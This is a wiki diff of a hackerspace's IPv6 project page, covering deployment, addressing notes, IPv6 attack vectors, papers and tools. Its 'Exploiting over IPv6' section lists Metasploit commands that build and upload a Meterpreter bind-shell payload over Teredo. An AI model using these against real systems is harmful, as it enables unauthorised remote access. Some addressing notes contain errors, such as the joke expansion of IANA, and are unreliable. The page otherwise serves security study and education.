Differences

This shows you the differences between two versions of the page.

--- project:ipv6 [2012/05/18 23:11] – [IPv6 implementation (network devices testing)] ruza
+++ project:ipv6:start [2016/11/28 02:23] – ruza
@@ Line 1: / Line 1: @@
+====== IPv6 ======
+{{template>:project:infobox_remoteimg|
+name=IPv6|
+image=ipv6.png?200|
+sw=|
+founder=[[user:ruza]]|
+interested=[[user:kxt]], [[user:biiter]]|
+status=active}}
+~~META:
+status = active
+&relation firstimage = :project:ipv6.png
+~~
+===== Goals of the Project =====
+  * [[wp>IPv6]] deployment
+  * education
+  * security research related to IPv6
+===== Status and Plan =====
+The project is currently in the planning stage.
+  * [DONE] our website http://brmlab.cz is accessible on IPv6
+==== World IPv6 day (8 June 2011) ====
+  * [DONE] we participate in World IPv6 day
+[[http://isoc.org/wp/worldipv6day/ipv6-enabled-websites/|{{ :project:ipv6-badge-blk-128-trans.png?nolink&200 |}}]]
+==== World IPv6 launch (6 June 2012) ====
+[[http://www.worldipv6launch.org/|{{  :project:world_ipv6_launch_badge_128.png?  }}]]
+==== 6or4 checkicon guy for your website ====
+Check your web server support [[https://httpd.apache.org/docs/current/mod/mod_include.html|SSI]]
+<code apache /etc/apache2/sites-enabled/000-default>
+SetEnvIf Server_Addr "^2001:" IPV6
+</code>
+<code bash>
+wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png
+wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
+</code>
+<code html index.html>
+<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" />
+  <!--#else -->        <img src="/images/ipv4.png" alt="IPv4 sad" />
+<!--#endif -->
+</code>
+===== Topics (attack vectors) =====
+==== Introduction to IPv6 ====
+  * [[http://www.oreillynet.com/onlamp/blog/2003/06/what_ever_happened_to_ipv5.html|What ever happened to IPv5?]] [[http://etherealmind.com/what-was-ipv5-version-5-ip/|2]]
+  * [[http://www.bieringer.de/linux/IPv6/IPv6-HOWTO/IPv6-HOWTO-6.html|quick intro]]
+  * [[https://wiki.kubuntu.org/IPv6|IPv6 on Ubuntu]] and [[https://wiki.kubuntu.org/IPv6|KUbuntu]]
+  * [[http://tldp.org/HOWTO/Linux+IPv6-HOWTO/x811.html|IPv6-ready test/debug programs]]
+  * [[http://labs.ripe.net/Members/gih/testing-teredo|Testing Teredo]] (labs.ripe.net)
+==== IPv6 Addressing Architecture ====
+  * The address notation for IPv6 is a group of 16 2-digit hexadecimal numbers, separated with a ':', global addresses are allocated by [[wp>IANA]] (Ip Address Not Available)
+  * "::" stands for a string of 0 bits.
+  * Special addresses are ::1 for loopback
+  * ::FFFF:<IPv4 address> for IPv4-mapped-on-IPv6
+  * fe00::0/8 ip6-localnet
+  * ff00::0 ip6-mcastprefix
+  * fe80::/10 individuální lokální linkové
+  * broadcast -> multicast
+Finding IPv6 hosts
+  * DNS (highly dependent), server logs
+  * MAC address allocations (EUI-64 standard)
+  * DoS targets [[http://www.iana.org/assignments/ipv6-multicast-addresses/ipv6-multicast-addresses.xml|1]]
+    * 3 site-local multicast addresses
+      * FF05::2 all-routers
+      * FF05::FB mDNSv6
+      * FF05::1:3 all DHCP servers
+    * Several link-local multicast addresses
+      * FF02::1 all nodes
+      * FF02::2 all routers
+      * FF02::F all UPnP
+      * ... (RFCs :?:)
+    * Some deprecated (RFC 3879) site-local addresses but still used
+      * FEC0:0:0:FFFF::1 DNS server
+http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1
+==== IPv6 Header Fields ====
+  * [[https://www.ipv6.cz/Form%C3%A1t_datagramu|Formát_datagramu]]
+==== IPv6 Extension Headers ====
+  * unlimited size of header chain DoS aka Routing header DoS vs RFC 5095
+==== IPv6 Privacy Extensions (RFC 3041) ====
+  * temporary address for host client application (eg. www browser)
+  * random 64bit ID
+  * can be disabled by Group POlicy Object (win) or DHCP
+==== IPv6 Options ====
+==== IPsec ====
+  * IPsec not required by IPv6
+  * blinds IPS, firewalls, ACLs
+  * network security relies more on endpoint security!
+  * DoS, malformed packets, spoofed and unprotected IKE messages (ICSA Labs methology)
+==== Internet Control Message Protocol version 6 (ICMPv6) ====
+  * more relied upon
+  * moar types
+==== Neighbor Discovery for IPv6 ====
+  * NDP replaces ARP
+    * not authenticated
+    * static entries overwritten by dynamic ones
+  * SEND (SEcure Neighbor Discovery)
+==== Multicast Listener Discovery ====
+==== Mobility (RFC 3775) ====
+  * http://natisbad.org/MIPv6/ [TODO]
+  * IPSEC VPN over IPv6 called [[http://danstoncloud.com/blogs/simplebydesign/archive/2011/10/08/directaccess-in-windows-8-sneak-preview.aspx|Microsoft Direct Access]] (Win 2008 server, Win8)
+==== Address Auto-configuration ====
+  * stateles (SLAAC)
+    * rogue Router Advertisement (DoS, MiTM)
+    * fe80:: (local link) + MAC (EUI-64)
+  * statefull DHCPv6, RFC 3315
+==== Dynamic Host Configuration Protocol version 6 (DHCPv6) ====
+==== Application support for IPv6 ====
+  * [[http://www.getipv6.info/index.php/Customer_problems_that_could_occur]]
+==== IPv6 firewalls ====
+  * ipv6 default policy allowed, not inspected
+  * imany icmp6 types needs to be allowed too
+  * how to build and maintain antispam reputation databases?
+  * fragmentation and reassembly is done only by the end system
+==== Transition/co-existence technologies (6to4, Teredo, ISATAP, etc.) ====
+==== Security Implications of IPv6 on IPv4-only networks ====
+  * running teredo/miredo you are using public IP address :!:
+  * [[wp>IPv6_brokenness_and_DNS_whitelisting]]
+==== Exploiting over IPv6 ====
+  * [[http://www.uninformed.org/?v=10&a=3|Penetration Testing with IPv6, 10/2008, hdm]]
+  * you dont want that miredo service start everytime (update-rc.d -f miredo remove).
+  * Faking IP address FIXME
+=== Windows ===
+  int ipv6 install
+  netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip)
+  netsh int ipv6 show teredo # we need qualified State
+  msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe
+  upload bind.exe
+  msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
+[[http://vimeo.com/15243189]]
+==== IPv6 implementation (network devices testing) ====
+  * [[wp>Comparison_of_IPv6_support_in_routers]]
+  * [[http://www-x.antd.nist.gov/usgv6/index.html|NIST tested products reports]] (ICSA labs)
+===== Papers, books =====
+  * [[http://www.thc.org/papers/vh_thc-ipv6_attack.pdf|Attacking the IPv6 Protocol Suite,
+van Hauser, THC]]
+  * [[http://ipv6-ghent.fi-week.eu/files/2010/12/1300-2-Vyncke.pdf|IPv6 security vendor Point of View, Vyncke, Cisco]]
+  * 39. Europen.cz, sbornik
+  * Cisco-Press-IPv6-Security-2009.pdf (@data)
+  * Cisco.Press.IPv6.for.Enterprise.Networks.Mar.2011.pdf (@data)
+  * Implementace_IPv6-CZNIC_academy.pdf (@data), [[http://www.nic.cz/akademie/course/18/detail/|CZ NIC akademie]]
+  * [[http://knihy.nic.cz/files/nic/edice/pavel_satrapa_ipv6_2011.pdf|{{:project:ipv6_book.png}}]]\\ Pavel Satrapa, 2011
+===== Links =====
+  * [[https://www.ipv6.cz/Co_je_IPv6|IPv6 wiki]]
+  * [[http://knihy.nic.cz/ipv6/|HowTo make IPv6 prefered for teredo/miredo]] (related to [[http://www.akkadia.org/drepper/linux-rfc3484.html|RFC3484]])
+  * [[http://petrkrcmar.blog.root.cz/2010/10/25/cim-si-vyzkouset-ipv6/|Čím si vyzkoušet IPv6?]] (root.cz)
+  * [[http://www.sixxs.net/wiki/IPv6_Specific_Content_in_Apache|IPv6_Specific_Content_in_Apache]]
+  * telnet -6 towel.blinkenlights.nl  (extra scenes)
+===== Tools =====
+  * [[http://ipv6-test.com/|IPv6 test]] :!:
+  * [[http://www.thc.org/thc-ipv6/|THC-IPv6]] attack tool
+  * [[http://www.hart.co.jp/ipv6/ipv6check.php|back{trace,ping} yourself]]
+  * [[http://ipv6-speedtest.net/]]